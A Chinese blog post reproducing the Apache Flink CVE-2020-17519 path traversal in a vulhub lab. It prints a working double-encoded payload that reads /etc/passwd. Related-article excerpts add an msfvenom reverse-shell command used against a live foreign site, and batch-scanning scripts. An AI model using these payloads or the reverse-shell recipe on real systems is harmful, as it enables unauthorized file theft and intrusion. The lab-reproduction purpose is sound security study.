Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

最新推荐文章于 2024-02-23 14:58:59 发布
最新推荐文章于 2024-02-23 14:58:59 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/119182793
版权
本文详细介绍了Apache Flink的CVE-2020-17519漏洞,该漏洞允许攻击者通过JobManager的REST接口读取JobManager本地文件系统上的敏感文件。影响版本包括1.11.0、1.11.1和1.11.2。通过环境搭建和Payload构造,展示了如何复现此漏洞。提供了一个有效的POC,并给出了相关参考链接,帮助读者理解和防范此类安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

一、漏洞描述

ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。
Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。
访问仅限于 JobManager 进程可访问的文件。

二、漏洞影响

Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2

三、漏洞复现

1、环境搭建

执行以下命令启动 Apache Flink JobManager 1.11.2:

cd vulhub/flink/CVE-2020-17519
docker-compose up -d

Apache Flink 启动后,访问 http://x.x.x.x:8081 查看主页:
在这里插入图片描述

2、漏洞复现

尝试访问/etc/passwd文件,构造Payload:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在这里插入图片描述

四、漏洞POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、参考链接

https://www.openwall.com/lists/oss-security/2021/01/05/2
https://vulhub.org/#/environments/flink/CVE-2020-17519/

[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)
qq_51577576的博客
09-26 3656
[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取。
Apache Flink CVE-2020-17518/CVE-2020-17519 文件操作漏洞复现
m0_48520508的博客
01-21 593
0x00简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01漏洞概述 CVE-2020-17519 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.
Apache Flink漏洞CVE-2020-17519复现
玄道的网安博客
01-06 5952
简介 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 漏洞概述 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 影响版本 1.11.0、1.11.1、1.11.2 环境搭建 使用vulhub进行安装 Vulhub地址: https://github.com/vulhu...
CVE-2020-17519 漏洞复现
weixin_43885355的博客
01-31 1414
CVE-2020-17519 0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobManager进程的REST API读取JobManag
[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)
Matrix42
01-07 2134
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞CVE-2020-17519:攻击者可通过REST API使用…/跳目录实现系统任意文件读取; CVE-2020-17518:通过构造恶意的http header,可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历
Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞复现
挚爱凝华的博客
04-13 3264
搭建环境 浏览器访问ip:8081端口 构造payload访问passwd文件 原理:利用 JobManager 的 REST API,读取 JobManager 本地文件系统上的任意文件(JobManager 进程有权限能够读取到的文件)。 修复漏洞:升级到1.11.3或1.12.0版本 ...
Apache Flink漏洞CVE-2020-17519复现以及suricata规则检测
ranuy阮的博客
01-06 1588
0x01 漏洞简介 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 0x02 影响版本 1.11.0 1.11.1 1.11.2 0x03 环境搭建 svn export https://github.com/vulhub/vulhub/trunk/flink/ 进入CVE-2
Apache Flink jobmanager/logs 目录穿越漏洞CVE-2020-17519
weixin_53639243的博客
02-23 291
复现:访问首页exp利用。
Apache Flink jobmanager/logs 目录穿越漏洞复现
Tauil的博客
07-22 1264
这个错误的返回就是说明我们没有成功跳出当前web目录,说明他存在有URL检查,拦截了我们的访问,那么我们可以在进行一次编码,来一个编码的二次方。%2fpasswd//这是“…URL后面的,而且他还不会将这个文件名称的URL进行加密等操作,直接放到URL后面进行访问,诶我这么说可能不太明白,就直接看图吧。%252fetc%252fpasswd//这是“…,一直添加到他成功访问到文件就行,或者是直接加一长串,那肯定就能访问到了。,告诉我们请求错误,你要找的文件不在这,所以我们就需要继续在URL中添加。.....
Apache Flink(CVE-2020-17519)路径遍历漏洞复现_附POC和批量检测脚本
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
01-06 1042
声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 Apache Flink 是高效和分布式的通用数据处理平台。 Apache Flink 声明式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
使用方法&免责声明 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、1.11.2 工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
CVE-2020-17519:CVE-2020-17519猎豹
04-17
CVE-2020-17519 CVE-2020-17519 Cheetah语言版,支持批量扫描。 将ip.txt复制到/script/漏洞探测/Apache/文件夹下,打开Wker主程序
Apache Flink jobmanager/logs 目录遍历 (CVE-2020-17519)
EC_Carrot的博客
06-04 484
漏洞复现 访问以下网址: http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 就能够读取/etc/passwd,我环境出问题了,复现不了…
Linux本地内核提权漏洞复现(CVE-2019-13272)
m0_48520508的博客
01-19 864
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
漏洞复现 Apache Flink CVE-2020-17519 任意文件读取漏洞
god_Zeo的安全博客
01-06 788
0x01 漏洞简介 Apache Flink Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobM
Apache Flink CVE-2020-17519
weixin_45682070的博客
02-04 297
fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行,找一个阿三的站试试 1:上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 592
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Apache Flink任意文件读取(CVE-2020-17519)
m0_65150886的博客
01-29 311
Apache Flink 功能强大,支持开发和运行多种不同种类的应用程序。它的主要特性包括:批流一体化、精密的状态管理、事件时间支持以及精确一次的状态一致性保障等。Flink不仅可以运行在包括YARN、Mesos、Kubernetes在内的多种资源管理框架上,还支持在裸机集群上独立部署。事实证明,Flink已经可以扩展到数千核心,其状态可以达到TB级别,且仍能保持高吞吐、低延迟的特性。Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。
Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519)和Nginx 越界读取缓存漏洞漏洞复现
weixin_48739941的博客
04-11 465
1、Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519) (1)漏洞原理 攻击者可以利用 JobManager 的 REST API,读取 JobManager 本地文件系统上的任意文件(JobManager 进程有权限能够读取到的文件)。 (2)修复 升级到1.11.3或1.12.0版本。 (3) cd vulhub/flink/CVE-2020-17519 切换目录。 (4)docker-compose up -d 启动。
CVE-2025复现
最新发布
02-26
### 复现 CVE-2025-0411 7-zip 漏洞 为了成功复现CVE-2025-0411漏洞,需遵循一系列精确的操作流程。此漏洞存在于7-zip软件中,利用了处理特定构造文件时存在的缺陷。 #### 准备工作环境 确保拥有一个安全隔离的测试环境至关重要,建议在一个专门用于实验的安全沙箱内操作。这可以防止潜在风险扩散到生产环境中[^2]。 #### 获取必要的工具和资源 访问GitHub仓库`https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git`下载针对该漏洞的概念验证(PoC)代码。通过克隆上述链接中的项目获取所需材料。 ```bash git clone https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git cd 7-Zip-CVE-2025-0411-POC/ ``` #### 安装受影响版本的应用程序 安装易受攻击的具体版本7-zip应用程序,在执行任何进一步步骤之前确认已正确设置目标应用及其依赖项。 #### 执行PoC脚本 按照README文档指示运行所提供的Python脚本来触发漏洞行为并观察其效果。通常情况下会有一个简单的命令行指令来启动测试过程: ```bash python exploit.py ``` 请注意,实际输出可能因具体实施细节而异;务必参照官方说明进行调整以适应不同场景下的需求。 #### 验证结果 一旦完成以上各阶段的工作,则应该能够看到预期的结果——即证明存在描述的安全隐患。然而重要的是要记住仅限于合法授权范围内开展此类活动,并始终采取适当措施保护个人隐私与数据安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值